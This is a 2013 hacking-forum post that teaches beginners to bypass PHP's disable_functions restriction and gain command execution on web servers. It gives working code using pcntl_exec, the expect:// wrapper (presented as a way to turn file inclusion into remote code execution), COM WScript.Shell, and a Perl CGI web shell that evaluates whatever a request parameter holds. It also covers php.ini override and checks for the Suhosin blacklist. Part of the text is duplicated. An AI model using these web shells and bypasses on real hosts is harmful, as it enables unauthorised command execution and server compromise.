10-06-2013, 01:34 AM
This is a thread I wrote for HF; it should be useful for beginners here that are willing to learn.
Some of you here, but not most (I assume), should already know about the "methods" I'm about to explain and provide examples of.
Let's begin.
Firstly, pcntl_exec() is usually overlooked because it's not apart of the default web package installation of PHP; the PCNTL extension is designed specifically to be utilized in a command-line environment.
It works identically to the *nix-style exec(); the process defined in the first argument of pcntl_exec() is replaced with the process calling it (php, in this case).
PCNTL is enabled by default in the CLI package of PHP, others will need to be compiled with the --enable-pcntl switch.
Bluehost has this extension enabled, just for the record.
Next is the expect:// wrapper. It isn't included in PHP at all, so don't expect to see it around very much.
The
It basically provides access to the given process's STDIN, STDOUT and STDERR via PTY (mainly for SSH and protocols alike).
As of PHP version 5.3.15, you'll need to add extension=php_com_dotnet.dll to your php.ini file where appropriate as it was removed. Previous versions of PHP should have it.
The following is a small example I came up with, it will execute a command and pipe it to STDOUT.
A CGI shell coded in something other than PHP will probably prove to be the most effective method of circumventing disable_functions as it only applies to PHP.
Here's a quick one I wrote, this should be sufficient in most cases.
php.ini override is apparently still a plausible and working method.
This is caused by misconfiguration of SuPHP (suphp.conf); not forcing users to use the global php.ini file defined under [phprc_paths] and/or allowing users to have a php.ini within their public_html directory to specify configuration settings themselves.
What you need to do should be self-explanatory.
If your issue is Suhosin related, then you might want to read
I'll just drop some self-explanatory code here, it might be useful if you're unsure if Suhosin is in the way.
Some of you here, but not most (I assume), should already know about the "methods" I'm about to explain and provide examples of.
Let's begin.
Firstly, pcntl_exec() is usually overlooked because it's not apart of the default web package installation of PHP; the PCNTL extension is designed specifically to be utilized in a command-line environment.
It works identically to the *nix-style exec(); the process defined in the first argument of pcntl_exec() is replaced with the process calling it (php, in this case).
PCNTL is enabled by default in the CLI package of PHP, others will need to be compiled with the --enable-pcntl switch.
Bluehost has this extension enabled, just for the record.
PHP Code:
echo extension_loaded('pcntl') ? 'Yes' : 'No'; // is_callable('pcntl_exec') if the extension is loaded, but you can't seem to call the function.
pcntl_exec('/bin/bash', array('-c', 'id'));
// You should note that anything after this won't get executed as php is being replaced with /bin/bash.
// Solution? Use pcntl_fork() to fork the current process (php), thus /bin/bash will replace the child process rather than the parent process.
Next is the expect:// wrapper. It isn't included in PHP at all, so don't expect to see it around very much.
The
[To see links please register here]
extension is available for download on PECL (a repository for PHP extensions).It basically provides access to the given process's STDIN, STDOUT and STDERR via PTY (mainly for SSH and protocols alike).
PHP Code:
echo in_array('expect', stream_get_wrappers()) ? 'Yes' : 'No';
include('expect://id'); // Good for escalating LFI to RCE as well.
[To see links please register here]
(Component Object Model) allows you to manipulate applications and services that operate within Windows, independent of the programming language used in the target object.As of PHP version 5.3.15, you'll need to add extension=php_com_dotnet.dll to your php.ini file where appropriate as it was removed. Previous versions of PHP should have it.
The following is a small example I came up with, it will execute a command and pipe it to STDOUT.
PHP Code:
// I usually see $shell->Run(), bad for backtracking SQL segments to the GPU's ALU circuit memory stack lulzsek; an integer is returned (it's how the OS validates success).
if(!(extension_loaded('com_dotnet') || dl('php_com_dotnet.dll'))) // Requires enable_dl to be "On" in php.ini.
die('Failed to load the COM extension.');
function wscript_exec($cmd)
{
$shell = new COM('WScript.Shell');
$output = $shell->Exec("cmd /C {$cmd}")->StdOut->ReadAll;
echo $output;
}
wscript_exec('dir'); // Usage example.
A CGI shell coded in something other than PHP will probably prove to be the most effective method of circumventing disable_functions as it only applies to PHP.
Here's a quick one I wrote, this should be sufficient in most cases.
PHP Code:
#!/usr/bin/perl
use strict;
use CGI;
my $cgi = new CGI;
my $cmd = $cgi->param('cmd');
print "Content-Type: text/html\r\n\r\n";
eval($cmd); # Should be enough for non-retards.
php.ini override is apparently still a plausible and working method.
This is caused by misconfiguration of SuPHP (suphp.conf); not forcing users to use the global php.ini file defined under [phprc_paths] and/or allowing users to have a php.ini within their public_html directory to specify configuration settings themselves.
What you need to do should be self-explanatory.
If your issue is Suhosin related, then you might want to read
[To see links please register here]
to gain some insight on how one would circumvent it.I'll just drop some self-explanatory code here, it might be useful if you're unsure if Suhosin is in the way.
PHP Code:
if(constant('SUHOSIN_PATCH') || extension_loaded('suhosin'))
echo ini_get('suhosin.executor.func.blacklist');